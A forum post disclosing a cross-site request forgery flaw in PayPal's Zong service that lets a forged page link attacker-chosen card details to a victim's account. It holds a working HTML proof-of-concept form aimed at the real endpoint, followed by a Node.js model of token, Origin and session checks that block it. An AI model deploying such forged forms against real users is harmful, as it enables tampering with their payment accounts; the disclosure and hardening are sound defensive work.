• PayPal Zong Service Credit Card & Billing Info Update CSRF

    Vendor product brief information: Zong aims to bring frictionless mobile payments to the world, processing millions of payments a month in over 40 countries.

    CSRF-vulnerable URL: https://my.zong.com/ZPlusConsumerCon...creditCardLink

    CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated (OWASP). The card-linking form below carries only two hidden fields, consumer_id and is_update, and no anti-CSRF token, so a copy of it hosted on any other origin is accepted with the victim's my.zong.com session cookies attached by the browser.

    POC:

    Code:
    <!-- Copy of the card-linking form, hosted on an attacker-controlled page.
         The browser attaches the victim's my.zong.com session cookie to the POST. -->
    <form action="https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink" method="post" name="manageCreditCardForm" id="manageCreditCardForm">
      <!-- Only two hidden fields; there is no anti-CSRF token to supply. -->
      <input type="hidden" name="consumer_id" value="10053353027" id="consumer_id">
      <input type="hidden" name="is_update" value="false" id="is_update">

      <label for="billing_first_name">First name </label>
      <input type="text" class="text required" id="billing_first_name" name="billing_first_name" value="sandeep">
      <label for="billing_last_name">Last name</label>
      <input type="text" class="text required" id="billing_last_name" name="billing_last_name" value="kamble">
      <label for="billing_card_type">Card type</label>
      <select name="billing_card_type" class="select1" id="billing_card_type">
        <option value="Visa">Visa</option>
        <option value="MasterCard">MasterCard</option>
        <option value="AmericanExpress">American Express</option>
        <option value="Discover">Discover</option>
      </select>

      <label for="billing_card_number">Card number</label>
      <!-- Attacker-chosen card details are pre-filled; the victim only has to press the button. -->
      <input type="text" class="text required" id="billing_card_number" name="billing_card_number" value="442411000016">

      <label for="billing_exp_month">Expiration date</label>
      <select name="billing_exp_month" class="select2" id="billing_exp_month">
        <option value="-1">Month</option>
        <option value="1">1</option>
        <option value="2">2</option>
        <option value="3">3</option>
        <option value="4">4</option>
        <option value="5">5</option>
        <option value="6">6</option>
        <option value="7">7</option>
        <option value="8">8</option>
        <option value="9">9</option>
        <option value="10">10</option>
        <option value="11">11</option>
        <option value="12">12</option>
      </select>
      <select name="billing_exp_year" class="select2" id="billing_exp_year">
        <option value="-1">Year</option>
        <option value="2013">2013</option>
        <option value="2014">2014</option>
        <option value="2015">2015</option>
        <option value="2016">2016</option>
        <option value="2017">2017</option>
        <option value="2018">2018</option>
        <option value="2019">2019</option>
        <option value="2020">2020</option>
        <option value="2021">2021</option>
        <option value="2022">2022</option>
        <option value="2023">2023</option>
      </select>

      <label for="billing_***">Security code</label>
      <input type="text" class="*** required" id="billing_***" maxlength="4" name="billing_***" value="">
      <button type="submit" id="_eventId_continue" name="_eventId_continue" value="continue" class="enterBtn"><span>Link Card</span></button>
    </form>
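    The PoC works because the handler accepts the POST on the strength of the session cookie alone, and the browser attaches that cookie to a form submitted from any origin. The following is an added example of how the server side of such a form is normally hardened; it is not Zong's or PayPal's code, and the route model, the JSESSIONID cookie name, the session store and the csrf_token field name are assumptions for illustration. It shows the three checks a reviewer would look for: a synchronizer token carried in the form body and bound to the session with an HMAC, an Origin/Referer check against the site's own origin, and taking the account identity from the session rather than from the consumer_id hidden field (the PoC hard-codes one, so without that change an attacker only needs to know the victim's identifier).

    ```javascript
    // Added example (not Zong's or PayPal's code): synchronizer-token, Origin and
    // session-identity checks for a state-changing POST such as the card-linking form.
    // The route, cookie name, session store and request shape are assumptions.
    const crypto = require("crypto");

    const SITE_ORIGIN = "https://my.zong.com";     // only origin allowed to post the form
    const SERVER_SECRET = crypto.randomBytes(32);  // assumed to come from server config
    const SESSION_COOKIE = "JSESSIONID";           // assumed session cookie name

    // Token = nonce.HMAC-SHA256(secret, sessionId|nonce). The MAC binds the token to
    // one session, so a token minted for the attacker's own account does not verify
    // for the victim's session, and nothing has to be stored server-side.
    function issueCsrfToken(sessionId, secret = SERVER_SECRET) {
      const nonce = crypto.randomBytes(16).toString("hex");
      const mac = crypto.createHmac("sha256", secret).update(`${sessionId}|${nonce}`).digest("hex");
      return `${nonce}.${mac}`;
    }

    function verifyCsrfToken(token, sessionId, secret = SERVER_SECRET) {
      if (typeof token !== "string") return false;
      const [nonce, mac] = token.split(".");
      if (!/^[0-9a-f]{32}$/.test(nonce || "") || !/^[0-9a-f]{64}$/.test(mac || "")) return false;
      const expected = crypto.createHmac("sha256", secret).update(`${sessionId}|${nonce}`).digest("hex");
      return crypto.timingSafeEqual(Buffer.from(mac, "hex"), Buffer.from(expected, "hex"));
    }

    // "a=1; b=2" -> { a: "1", b: "2" }
    function parseCookies(header = "") {
      const out = {};
      for (const part of header.split(";")) {
        const i = part.indexOf("=");
        if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
      }
      return out;
    }

    // Model of the POST .../linkCC/creditCardLink handler.
    // req = { headers: { origin, referer, cookie }, body: { ...form fields } }
    // sessions = Map<sessionId, { consumerId }>
    function handleLinkCard(req, sessions) {
      const cookies = parseCookies(req.headers.cookie);
      const sessionId = cookies[SESSION_COOKIE];
      const session = sessionId && sessions.get(sessionId);
      if (!session) return { status: 401, reason: "no session" };

      // Check 1: browsers send Origin (or at least Referer) on cross-site form
      // POSTs; anything other than our own origin is rejected.
      let origin = req.headers.origin;
      if (!origin && req.headers.referer) origin = new URL(req.headers.referer).origin;
      if (origin !== SITE_ORIGIN) return { status: 403, reason: "cross-site origin" };

      // Check 2: the token travels in the form body, which a foreign page cannot
      // read and the browser does not attach automatically.
      if (!verifyCsrfToken(req.body.csrf_token, sessionId)) {
        return { status: 403, reason: "missing or invalid csrf token" };
      }

      // Check 3: the account being changed comes from the session, never from a
      // hidden consumer_id field that any page can fill in.
      const card = String(req.body.billing_card_number || "").replace(/\s/g, "");
      if (!/^\d{12,19}$/.test(card)) return { status: 400, reason: "bad card number" };
      return { status: 200, consumerId: session.consumerId, last4: card.slice(-4) };
    }

    // Constructed demo: the PoC form posted from an attacker page (foreign Origin,
    // no token), the genuine form from the site, and a token minted for another session.
    function demo() {
      const sessions = new Map([["s-victim", { consumerId: "10053353027" }]]);
      const cookie = `${SESSION_COOKIE}=s-victim`;
      const form = {
        consumer_id: "10053353027", is_update: "false",
        billing_first_name: "sandeep", billing_last_name: "kamble",
        billing_card_type: "Visa", billing_card_number: "442411000016",
        billing_exp_month: "1", billing_exp_year: "2015",
      };
      const fromAttacker = handleLinkCard(
        { headers: { origin: "https://attacker.example", cookie }, body: form }, sessions);
      const fromSite = handleLinkCard(
        { headers: { origin: SITE_ORIGIN, cookie }, body: { ...form, csrf_token: issueCsrfToken("s-victim") } },
        sessions);
      const replayed = handleLinkCard(
        { headers: { origin: SITE_ORIGIN, cookie }, body: { ...form, csrf_token: issueCsrfToken("s-attacker") } },
        sessions);
      return { fromAttacker, fromSite, replayed };
    }
    ```

    The token check is the one that matters; the Origin check is defence in depth, since some clients omit both Origin and Referer and a strict deployment then has to decide whether to reject those requests (as this model does) or fall back to the token alone.
    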
    Thanks to PayPal for such a good bounty program and to the PayPal security team.
    Special thanks to my G4H team.


    --[S]
    This article was originally published in the forum thread "Paypal service Zong Update Credit Card & Billing Information CSRF" started by [s].